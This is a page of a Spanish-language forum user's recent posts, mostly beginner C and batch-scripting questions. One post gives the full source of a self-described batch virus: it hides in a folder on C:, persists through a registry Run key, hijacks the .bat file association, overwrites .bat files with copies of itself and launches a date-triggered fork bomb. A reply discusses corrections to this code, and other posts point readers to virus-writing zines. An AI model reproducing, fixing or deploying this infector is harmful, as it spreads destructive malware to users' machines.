últimos mensajes de: 0x3c

Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12

31	Programación / Scripting / Re: [src]batch-virus]f_to	en: 17 Enero 2013, 21:25 pm
por lo que veo voy a tengo que leer mucho para seguir escribiendo 'bichitos'...tendre que hacer una version 2 de esto.... Citar Código if %date% GEQ 13-12-13 ( Esto es imposible que te funcione: - el símbolo es "/", y tu estás comparando el guión "-". - la variable DATE contiene 8 dígitos, no 6. - no estás usando un orden de comparación correcto: Tu estás haciendo esto Código if %date% GEQ 13-12-13 con esto el problema es que para ver si me funcionaria lo probe en la CMD... Citar Código ::busca archivos .bat y los infecta for /R %%i in (.bat) do copy %0 %%i for /R %%i in (.bat) do attrib +s +h %%i Estás haciendo dos pasadas en el disco duro, eso puede tardar siglos usando batch, cuando puedes concatenar los dos comandos en el mismo FOR. bueno esto lo sabia por que probe esta parte del codigo y si tardo bastante pero este script trate de hacerlo lo mas "detectable" por eso no quise ponerle ningun tipo de proteccion..de cierta forma no quiero que ande gente infectando personas con un script que yo hice...hay partes de las correciones que hiciste que no entiendo... E.P.: Citar :Loop (Start /B "" "%~0") & (Goto :Loop) por ejemplo no sabia que se podia empezar una linea de codigo con un parentesis :O bueno la 'forkbomb' quise hacerla a la antigua...pero como dije hay cosas que no entiendo en las correcion que hiciste.. Citar For /F "Tokens=1-3 Delims= " %%A in ('REG Query "HKCR\.avi" /V ""') Do (Assoc ".bat"="%%C") IF %date:~6,4%%date:~3,2%%date:~0,2% GEQ 20131213 sobre esta parte todavia no me relaciono con FOR muy bien asi que esta parte del codigo no la entiendo bien...segun puedo ver estas tratando de contar tokens y delimitas algo?? explicame mejor esa parte por favor si puedes...por cierto las correciones que hiciste claro que son bienvenidas gracias por tomarte el tiempo de revisar el codigo... E.P.2: Citar Pregunta: ¿Que sentido le das ejecutar de nuevo el bat en un búcle infinito, si cuando la carpeta "placenta" ya está creada, el propio bat se cierra?. esto es cierto...al parecer como lo hice con ganas de experimentar se me pasaron ciertas cosas saludos

32	Programación / Programación C/C++ / Re: caso raro!	en: 17 Enero 2013, 17:51 pm
@rir3760 soy novato en esto de la programacion...en el libro que estoy leyendo dice que gets() y atoi() son funciones inseguras y que no deberian usarse, al menos no en pogramas serios..gracias por la recomendacion tendre que darle una leida al link que pusiste @todos gracias por sus sugerencias ademas debo decirles que siempre se me olvida decir que estoy programando bajo GNU/Linux no bajo Windows saludos

33	Seguridad Informática / Análisis y Diseño de Malware / Re: Malware mas alla de Windows.	en: 17 Enero 2013, 17:28 pm
lo que paso con rRlF es que su dominio estaba hosteado por vxHeavens por lo tanto al caer vxHeavens tambien cayeron ellos, pero de todas formas busca algo sobre EOF-project y DoomRiders o Valhala quizas todavia quede uno que otro articulo por la red... en cuanto a virus que infectan GNU/Linux, tambien para GNU/Linux hay virus que infectan ficheros de extension .pl, .js, .py, y demas.. saludos

Programación / Scripting / [src]batch-virus]f_to

en: 17 Enero 2013, 16:32 pm

yo en mi aburrimiento nocturno cree el siguiente codigo infector de archivos con la extension .bat, les pido de ante mano que si tienen alguna recomendacion o encuentran algun error me lo hagan saber..el codigo es bastante simple...aqui el codigo:

Código

::*************************************************************
::* nombre:f_to -- payload:si [fork-bomb] -- infeccion:si 
::* tipo:.bat infector -- Anti AV tech:no -- propagacion:no
::*========================================
::*=Este codigo fue creado con fines autodidacticos solamente
::*=el autor del mismo(osea yo) no tomara responsabilidad de
::*=ningun problema causado como resultado de su ejecucion
::*==================n3t_3rr0r@hushmail.com==
::*************************************************************
::@echo off
::salta al disco C:
cd\
::si existe el directorio "placenta" salta a una etiqueta que termina su ejecucion sino salta a otra etiqueta para continuar su ejecucion
if exist placenta (
goto _eof
) else ( 
goto _cnt
)
:_cnt
::crea una carpeta para alojarse
mkdir placenta 
::le da attributos oculto/solo lectura/sistema
attrib +h +r +s placenta
::se auto-copia con el nombre f_to
copy %0 > c:\placenta\f_to.bat
::toma atributos de lectura y systema
attrib +r +s c:\placenta\f_to.bat
::se asocia a la extension .avi
assoc .bat=avifile
::agrega una llave al registro para garantizar ejecucion durante el proximo inicio
reg add HKLM\Microsoft\Windows\CurrentVersion\Run /v SysMgr /t Reg_SZ /d C:\placenta\f_to.bat
::payload - si la fecha es igual o mayor que 13-12-13 salta a la etiqueta para activar el payload
if %date% GEQ 13-12-13 (
goto _pyld
) else (
goto _eof
)
::busca archivos .bat y los infecta
for /R %%i in (*.bat) do copy %0 %%i
::y luego le da atributos de sistema/oculto
for /R %%i in (*.bat) do attrib +s +h %%i
:_pyld
:_fb
start %0
goto _fb
:_eof
exit /B

saludos

35	Programación / Programación C/C++ / Re: caso raro!	en: 17 Enero 2013, 13:57 pm
creo que para hacer eso deberia de eliminar el uso de atoi()? o no? saludos y gracias

36	Programación / Programación C/C++ / caso raro!	en: 17 Enero 2013, 13:44 pm
practicando los ejemplos del libro de C que estoy leyendo pude crear un programa que lo unico que hace es comparar la altura del usuario con la mia(suena bastante estupido lo se) todo funciona bien el programa compila y se ejecuta a la perfeccion ...sin embargo deberia fallar cuando en vez de recibir un numero recibe una letra cosa que no pasa, habra algun error?? E.P.:se me olvido preguntar si quiero que el programa muestre un error cuando el input es una latra y no un numero como lo puedo hacer?? por ejemplo lo ejecute y le puse 'h' en vez de de un numero del 1 al 9 y el mensaje que recibi fue: Soy mayor que tu este es el codigo: Código: #include <stdio.h> #include <stdlib.h> int main() { char feet[2]; int msr; printf("Di tu altura en pies:"); gets(feet); msr=atoi(feet); if(msr>5) printf("Eres mas alto que yo!.\n"); if(msr<5) printf("Soy mas alto que tu!\n"); if(msr==5) printf("Somos de la misma altura!!.\n"); return(0); } saludos

37	Seguridad Informática / Análisis y Diseño de Malware / Re: Malware mas alla de Windows.	en: 17 Enero 2013, 02:16 am
busca informacion sobre 29a y rRlF, en sus eZines publicaron articulos, codigo y hasta archivos binarios de virus que 'trabajaban' bajo GNU/Linux..tambien deberias leerte algunos articulos de phrack en los que se habla de infeccion de archivoa .elf saludos

38	Programación / Scripting / Re: saber el tamano de un archivo en batch?	en: 15 Enero 2013, 17:49 pm
Gracias! gracias! debo admitir que en principio me confundi un poco cuando vi los '() ()' vacios pero despues entendi que es para alojar las funciones si el condicionar es positivo o negativo.. saludos

39	Programación / ASM / Re: Libro de ASM para linux.	en: 14 Enero 2013, 22:40 pm
te aconsejo que si no eres muy exerimentado programando para GNU/Linux empieces por ASM para Windows.. saludos

40	Seguridad Informática / Análisis y Diseño de Malware / Re: ¿Saltarse heuristicas y sandbox modeando?	en: 14 Enero 2013, 22:31 pm
Citar Es un debate absurdo. Dudo que alguien esté verdaderamente interesado en encontrar vulnerabilidades de semejante naturaleza en esa clase de software, tanto por ser complicado como tedioso. me imagino entonces que querras decir que para encontrar una vulnerabilidad en un 'tipo' de software, debe ser software de ese que realiza operaciones matematicas complejas o no puede ser software de ese que le llaman 'hardcoded' Citar De todos modos estas cosas son para gente trabajólica y yo no soy uno de ellos. no me sorprenderia si me dijeras que nunca as descubierto/hecho nada...ese es el tipo de atitud que tienen los vagos saludos

Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12